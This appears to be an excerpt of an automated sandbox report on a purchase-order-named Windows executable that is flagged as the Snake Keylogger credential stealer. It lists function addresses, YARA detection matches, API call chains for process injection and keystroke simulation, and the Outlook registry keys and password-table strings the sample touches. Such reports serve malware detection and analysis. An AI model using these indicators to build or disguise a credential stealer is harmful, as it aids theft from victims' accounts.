                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F9702_2_05A6F970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A60D482_2_05A60D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D9482_2_05A6D948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D4A02_2_05A6D4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D4B02_2_05A6D4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A638B82_2_05A638B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A604872_2_05A60487
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A664802_2_05A66480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6B4882_2_05A6B488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A664902_2_05A66490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A604982_2_05A60498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A698E92_2_05A698E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A608F02_2_05A608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A698F82_2_05A698F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F4C82_2_05A6F4C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F4D82_2_05A6F4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6602A2_2_05A6602A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F0312_2_05A6F031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A660382_2_05A66038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A600072_2_05A60007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A630082_2_05A63008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6D0082_2_05A6D008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A634602_2_05A63460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A694602_2_05A69460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6B4782_2_05A6B478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A600402_2_05A60040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6F0402_2_05A6F040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A634512_2_05A63451
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A694512_2_05A69451
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6345F2_2_05A6345F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6EBA82_2_05A6EBA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A68FB72_2_05A68FB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A62BB02_2_05A62BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A67B872_2_05A67B87
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6CB802_2_05A6CB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A657882_2_05A65788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A62B9F2_2_05A62B9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6EB992_2_05A6EB99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A65BE02_2_05A65BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6AFE02_2_05A6AFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6AFF02_2_05A6AFF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A62FFA2_2_05A62FFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A65BCF2_2_05A65BCF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A653202_2_05A65320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A677212_2_05A67721
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A653302_2_05A65330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A677302_2_05A67730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A623002_2_05A62300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E7012_2_05A6E701
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E7102_2_05A6E710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A67B772_2_05A67B77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6CB702_2_05A6CB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A627492_2_05A62749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6AB492_2_05A6AB49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A627582_2_05A62758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6AB582_2_05A6AB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61EA82_2_05A61EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A6B02_2_05A6A6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66E822_2_05A66E82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64A802_2_05A64A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66E802_2_05A66E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61E992_2_05A61E99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C6E82_2_05A6C6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A622F02_2_05A622F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A672C72_2_05A672C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A6C02_2_05A6A6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64ECA2_2_05A64ECA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64ED82_2_05A64ED8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A672D82_2_05A672D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C6D92_2_05A6C6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A646282_2_05A64628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66A282_2_05A66A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A2282_2_05A6A228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61A3F2_2_05A61A3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6461A2_2_05A6461A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66A182_2_05A66A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A2182_2_05A6A218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64A6F2_2_05A64A6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E2682_2_05A6E268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E2782_2_05A6E278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C2412_2_05A6C241
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61A502_2_05A61A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C2502_2_05A6C250
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: String function: 00670D27 appears 70 times
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: String function: 00657F41 appears 36 times
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: String function: 00678B40 appears 42 times
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.977473937.000000000407D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003CB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BA2D5 GetLastError,FormatMessageW,0_2_006BA2D5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A8713 AdjustTokenPrivileges,CloseHandle,0_2_006A8713
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006A8CC3
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006BB59E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006CF121
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_006BC602
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00654FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00654FE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeFile created: C:\Users\user\AppData\Local\Temp\spadoJump to behavior
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003119000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000314B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000310B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000313E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic file information: File size 1631232 > 1048576
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006CC304 LoadLibraryA,GetProcAddress,0_2_006CC304
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00678B85 push ecx; ret 0_2_00678B98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01259C30 push esp; retf 0127h2_2_01259D55
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00654A35
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006D55FD
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006733C7
